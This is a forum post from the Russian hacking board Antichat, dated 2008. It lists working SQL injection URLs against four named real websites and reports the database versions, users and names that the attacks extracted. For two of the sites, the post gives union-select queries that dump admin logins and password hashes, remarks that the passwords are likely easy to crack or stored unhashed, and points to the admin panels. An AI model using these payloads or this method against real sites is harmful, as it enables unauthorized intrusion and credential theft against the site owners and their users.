Форум АНТИЧАТ - SQL Инъекции

#11

01.12.2008, 11:09

bons

Участник форума

Регистрация: 20.12.2007

Сообщений: 295

Провел на форуме:
1777055

Репутация: 347

www.softstandart.com, тИЦ = 10

Код:

http://www.softstandart.com/feedback.php?id=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+0
http://www.softstandart.com/?ks_cat=9999%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+0

вторая инъекция - вывод всех записей

version() - 5.0.67-log
database() - softstandart
user() - james303@galaxie.dreamhost.com

здесь вероятно логин и хэш админа:

Код:

http://www.softstandart.com/?ks_cat=9999%27+union+select+1,2,3,4,concat(id,':',login,':',pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+user--+0

интуиция говорит мне что он быстро подбирается и подходит к админке: http://www.softstandart.com/admin
-----------------------------

www.bfpais.ru, тИЦ = 10

Код:

http://www.bfpais.ru/index.php3?id=6191&nid=-1+union+select+1,2,3,concat(version(),0x3A,user(),0x3A,database()),5,6,7,8,9--

version() - 5.0.67
user() - bfpais@localhost
database() - bfpais

Код:

http://www.bfpais.ru/index.php3?id=6191&nid=-1+union+select+1,2,3,4,5,6,concat(id,0x3A,nick,0x3A,passwd,0x3A,access),8,9+from+_user+limit+0,1--

как мне кажется, есть большая вероятность что здесь пароль вообще даже не хэширован и подходит к админке: http://www.bfpais.ru/admin
-----------------------------

www.infoliolib.info, тИЦ = 160

Код:

http://www.infoliolib.info/author.php?aid=-1+union+select+1,concat(version(),0x3A,user(),0x3A,database()),3--

version() - 5.0.51a-community
user() - infoli_user@localhost
database() - infoli_infolio
-----------------------------

www.studentam.by

Код:

http://www.studentam.by/index.php?m=6&cl=l&mn=1&id=-1+union+select+version(),database(),user()--

version() - 5.0.51a-6-log
database() - studentamby
user() - studentamby@localhost